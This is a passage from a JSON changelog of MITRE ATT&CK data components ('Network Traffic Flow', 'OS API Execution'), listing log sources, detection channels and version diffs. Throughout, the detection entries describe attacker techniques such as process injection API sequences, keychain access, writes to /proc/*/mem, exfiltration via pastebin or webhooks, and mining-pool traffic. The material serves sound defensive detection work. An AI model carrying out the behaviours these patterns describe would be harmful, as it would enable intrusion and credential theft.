\"root['x_mitre_log_sources'][262]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category\"}, \"root['x_mitre_log_sources'][263]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow\"}, \"root['x_mitre_log_sources'][264]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval\"}, \"root['x_mitre_log_sources'][265]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity\"}, \"root['x_mitre_log_sources'][266]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class\"}, \"root['x_mitre_log_sources'][267]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content\"}, \"root['x_mitre_log_sources'][268]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile\"}, \"root['x_mitre_log_sources'][269]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session\"}, \"root['x_mitre_log_sources'][270]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior\"}, \"root['x_mitre_log_sources'][271]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception\"}, \"root['x_mitre_log_sources'][272]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-09 17:32:30.362000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0078",
                            "external_id": "DC0078"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Traffic Flow",
                    "description": "Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "socket_events"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected flows between segmented networks or prohibited ports"
                        },
                        {
                            "name": "snmp:config",
                            "channel": "Configuration change traps or policy enforcement failures"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time outbound connections to package registries or unknown hosts immediately after restore/build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to new registries/CDNs post-install/build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to non-approved registries after dependency install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connections to TCP 139,445 and HTTP/HTTPS to WebDAV endpoints from workstation subnets"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large outbound data flows or long-duration connections"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "egress > 90th percentile or frequent connection reuse"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "esxcli network vswitch or DNS resolver configuration updates"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "Network Events"
                        },
                        {
                            "name": "iptables:LOG",
                            "channel": "TCP connections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection metadata"
                        },
                        {
                            "name": "wineventlog:dhcp",
                            "channel": "DHCP Lease Granted"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LEASE_GRANTED"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "MAC not in allow-list acquiring IP (DHCP)"
                        },
                        {
                            "name": "Windows Firewall Log",
                            "channel": "SMB over high port"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Internal connection logging"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "pf firewall logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inter-segment traffic"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Long-lived or hijacked SSH sessions maintained with no active user activity"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "VPC/NSG flow logs for pod/instance egress to Internet or metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious outbound traffic from browser binary to non-standard domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abnormal browser traffic volume or destination"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound requests to domains not previously resolved or associated with phishing campaigns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to domains/IPs not previously resolved, occurring shortly after attachment download or link click"
                        },
                        {
                            "name": "M365Defender:DeviceNetworkEvents",
                            "channel": "NetworkConnection: bytes_sent >> bytes_received anomaly"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "outbound flows with bytes_out >> bytes_in"
                        },
                        {
                            "name": "NSX:FlowLogs",
                            "channel": "network_flow: bytes_out >> bytes_in to external"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/Zeek conn.log"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound data flows"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow records with entropy signatures resembling symmetric encryption"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "flow records"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "flow records"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTPS POST to known webhook URLs"
                        },
                        {
                            "name": "saas:api",
                            "channel": "Webhook registrations or repeated POST activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Source/destination IP translation inconsistent with intended policy"
                        },
                        {
                            "name": "SNMP:DeviceLogs",
                            "channel": "Unexpected NAT translation statistics or rule insertion events"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sudden spike in incoming flows to web service ports from single/multiple IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Unusual volume of inbound packets from single source across short time interval"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "port 5900 inbound"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP port 5900 open"
                        },
                        {
                            "name": "NSM:firewall",
                            "channel": "inbound connection to port 5900"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound connections to 139/445 to multiple destinations"
                        },
                        {
                            "name": "VPCFlowLogs:All",
                            "channel": "High volume internal traffic with low entropy indicating looped or malicious DoS script"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/sFlow/PCAP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound Network Flow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.network"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Device-to-Device Deployment Flows"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect syscalls"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound TCP/UDP traffic over unexpected port"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi service connections on unexpected ports"
                        },
                        {
                            "name": "iptables:LOG",
                            "channel": "OUTBOUND"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "tcp/udp"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "CLI network calls"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic from suspicious new processes post-attachment execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious anomalies in transmitted data integrity during application network operations"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "DNS resolution events leading to outbound traffic on unexpected ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to mining pools or proxies"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound flow logs to known mining pools"
                        },
                        {
                            "name": "container:cni",
                            "channel": "Outbound network traffic to mining proxies"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "TLS session established by ESXi service to unapproved endpoint"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session records with TLS-like byte patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTPS POST requests to pastebin.com or similar"
                        },
                        {
                            "name": "NetFlow:Flow",
                            "channel": "new outbound connections from exploited process tree"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "new connections from exploited lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected route changes or duplicate gateway advertisements"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
                            "channel": "EventCode=2004, 2005, 2006"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Knock pattern: repeated REJ/S0 across \u2265MinSequenceLen ports from same src_ip then SF success."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Firewall/PF anchor load or rule change events."
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config/ACL changes, line vty transport input changes, telnet/ssh/http(s) enable, image/feature module changes."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to non-approved update hosts right after install/update"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New outbound flows to non-approved vendor hosts post install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New/rare egress to non-approved update hosts after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large outbound HTTPS uploads to repo domains"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS traffic to repository domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "alert log"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound flow records"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "NetworkConnection: high out:in ratio, periodic beacons, protocol mismatch"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "high out:in ratio or fixed-size periodic flows"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "network_flow: bytes_out >> bytes_in, fixed packet sizes/intervals to non-approved CIDRs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect or sendto system call with burst pattern"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "sudden burst in outgoing packets from same PID"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "source instance sends large volume of traffic in short window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "session stats with bytes_out > bytes_in"
                        },
                        {
                            "name": "NIDS:Flow",
                            "channel": "session stats with bytes_out > bytes_in"
                        },
                        {
                            "name": "esxi:vpxa",
                            "channel": "connection attempts and data transmission logs"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "External traffic to remote access services"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High volumes of SYN/ACK packets with unacknowledged TCP handshakes"
                        },
                        {
                            "name": "dns:query",
                            "channel": "Outbound resolution to hidden service domains (e.g., `.onion`)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log + ssl.log with Tor fingerprinting"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "forwarded encrypted traffic"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Relayed session pathing (multi-hop)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound TCP SYN or UDP to multiple ports/hosts"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "container-level outbound traffic events"
                        },
                        {
                            "name": "WLANLogs:Association",
                            "channel": "Multiple APs advertising the same SSID but with different BSSID/MAC or encryption type"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "socket_events"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "ARP cache modification attempts observed through event tracing or security baselines"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Gratuitous ARP replies with mismatched IP-MAC binding"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ARP table updates inconsistent with expected gateway or DHCP lease assignments"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "networkd or com.apple.network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream 'eventMessage contains \"dns_request\"'"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "/var/log/syslog.log"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "CreateTrafficMirrorSession or ModifyTrafficMirrorTarget"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config change: CLI/NETCONF/SNMP \u2013 'monitor session', 'mirror port'"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound UDP floods targeting common reflection services with spoofed IP headers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound UDP spikes to external reflector IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large outbound UDP traffic to multiple public reflector IPs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "High entropy domain queries with multiple NXDOMAINs"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Frequent DNS queries with high entropy names or NXDOMAIN results"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "API communication"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound Connection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connection Tracking"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "pf firewall logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow Creation (NetFlow/sFlow)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, icmp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abnormal SMB authentication attempts correlated with poisoned LLMNR/NBT-NS sessions"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Gratuitous or duplicate DHCP OFFER packets from non-legitimate servers"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Inbound on ports 5985/5986"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Multiple IP addresses assigned to the same domain in rapid sequence"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Rapid domain-to-IP resolution changes for same domain"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Frequent DNS resolution of same domain with rotating IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "uncommon ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "alternate ports"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log or flow data"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "egress log analysis"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "egress logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High volume flows with incomplete TCP sessions or single-packet bursts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Knock pattern: multiple REJ/S0 to distinct closed ports then successful connection to service_port"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Firewall rule enable/disable or listen socket changes"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Config/ACL/line vty changes, service enable (telnet/ssh/http(s)), module reloads"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ioctl: Changes to wireless network interfaces (up, down, reassociate)"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: Historical list of associated SSIDs compared against baseline"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress from host after new install to unknown update endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to unknown registries/mirrors immediately after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress from app just installed to unknown update endpoints"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi processes relaying traffic via SSH or unexpected ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connection to mining pool port (3333, 4444, 5555)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to mining pool upon container launch"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow records with RSA key exchange on unexpected port"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connections from web server binaries (apache2, nginx, php-fpm) to unknown external IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "sustained outbound HTTPS sessions with high data volume"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections from IDE hosts to marketplace/tunnel domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound connections from IDE processes to marketplace/tunnel domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS outbound uploads"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network flows to external cloud services"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP port 22 traffic"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "port 22 access"
                        },
                        {
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
                        },
                        {
                            "name": "TelecomLogs:MobilityEvents",
                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:32:30.362000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0078\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0078\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][155]\": {\"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected location resolution events or abnormal subscriber tracking requests\"}, \"root['x_mitre_log_sources'][156]\": {\"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected subscriber tracking or abnormal mobility/location resolution activity\"}, \"root['x_mitre_log_sources'][157]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns\"}, \"root['x_mitre_log_sources'][158]\": {\"name\": \"NSM:Flow\", \"channel\": \"App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-23 18:22:40.476000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0021",
                            "external_id": "DC0021"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "OS API Execution",
                    "description": "Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Base",
                            "channel": "GetLocaleInfoW, GetTimeZoneInformation API calls"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetMetadata, DescribeInstanceIdentity"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "open, execve: Unexpected processes accessing or modifying critical files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, ioctl"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API tracing / stack tracing via ETW or telemetry-based EDR"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "Behavioral API telemetry (GetProcAddress, LoadLibrary, VirtualAlloc)"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "aaa privilege_exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "APCQueueOperations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Invocation of SMLoginItemSetEnabled by non-system or recently installed application"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "flock|NSDistributedLock|FileHandle.*lockForWriting"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Directory-Services-SAM",
                            "channel": "api_call: Calls to DsAddSidHistory or related RPC operations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "application logs referencing NSTimer, sleep, or launchd delays"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "High-frequency or suspicious sequence of QueryPerformanceCounter/GetTickCount API calls from a non-standard process lineage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Rules capturing clock_gettime, time, gettimeofday syscalls when enabled"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Unexpected reload, crashinfo, or boot message not tied to scheduled maintenance"
                        },
                        {
                            "name": "etw:Microsoft-Windows-RPC",
                            "channel": "rpc_call: srvsvc.NetShareEnum / NetShareEnumAll from non-admin or unusual processes"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smb_command: TreeConnectAndX to \\\\*\\IPC$ / srvsvc or Trans2/NT_CREATE for listing shares"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "API usage MFCreateDeviceSource, IAMStreamConfig, ICaptureGraphBuilder2, DirectShow filter graph creation from uncommon callers"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat/read/ioctl: openat/read/ioctl on /dev/video* by uncommon user/process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access decisions to kTCCServiceCamera for unexpected binaries"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "Objective\u2011C/Swift calls to AVCaptureDevice/AVCaptureSession by non-whitelisted processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mmap, ptrace, process_vm_writev or direct memory ops"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "API call to AddMonitor invoked by non-installer process"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Win32k",
                            "channel": "SetWindowLong, SetClassLong, NtUserMessageCall, SendNotifyMessage, PostMessage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unshare, mount, keyctl, setns syscalls executed by containerized processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "audio APIs"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-COM/Operational",
                            "channel": "CLSID activation events where ProcessName=mmc.exe and CLSID not in allowed baseline"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.securityd, com.apple.tccd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "send, recv, write: Abnormal interception or alteration of transmitted data"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CALCULATE: Integrity validation of transmitted data via hash checks"
                        },
                        {
                            "name": "ETW:Token",
                            "channel": "token_analysis: API calls such as DuplicateTokenEx or ImpersonateLoggedOnUser"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API Calls"
                        },
                        {
                            "name": "etw:Microsoft-Windows-DotNETRuntime",
                            "channel": "AssemblyLoad/ModuleLoad (Loader keyword) from Microsoft-Windows-DotNETRuntime"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "VirtualAlloc/VirtualProtect/MapViewOfFile indicators via stack/heap activity and ImageLoad"
                        },
                        {
                            "name": "auditd:MMAP",
                            "channel": "memory region with RWX permissions allocated"
                        },
                        {
                            "name": "snmp:trap",
                            "channel": "management queries"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "Describe* or List* API calls"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Win32k",
                            "channel": "SendMessage, PostMessage, LVM_*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sudo or pkexec invocation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "authorization execute privilege requests"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "NtQueryInformationProcess"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ptrace: Processes invoking ptrace with PTRACE_TRACEME flag"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Remote access API calls and file uploads"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Execution of modified binaries or abnormal library load sequences"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Calls to AuthorizationExecuteWithPrivileges() observed via Apple System Logger or security_auditing tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access or unlock attempt to keychain database"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of input detection APIs (e.g., CGEventSourceKeyState)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mount system call with bind or remap flags"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "Decrypt"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-File",
                            "channel": "ZwSetEaFile or ZwQueryEaFile function calls"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "fork/clone/daemon syscall tracing"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Detached process execution with no associated parent"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, mmap, mprotect, open, dlopen"
                        },
                        {
                            "name": "ETW:ProcThread",
                            "channel": "api_call: CreateProcessWithTokenW, CreateProcessAsUserW"
                        },
                        {
                            "name": "EDR:memory",
                            "channel": "MemoryWriteToExecutable"
                        },
                        {
                            "name": "ETW:Token",
                            "channel": "api_call: DuplicateTokenEx, ImpersonateLoggedOnUser, SetThreadToken"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "api_call: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and CreateProcess* with EXTENDED_STARTUPINFO_PRESENT / StartupInfoEx"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Security-Auditing",
                            "channel": "api_call: LogonUser(A|W), LsaLogonUser, SetThreadToken, ImpersonateLoggedOnUser"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "API calls"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace, mmap, process_vm_writev"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of dd or sed targeting /proc/*/mem"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "CreateTransaction, CreateFileTransacted, RollbackTransaction, NtCreateProcessEx, NtCreateThreadEx"
                        },
                        {
                            "name": "ETW",
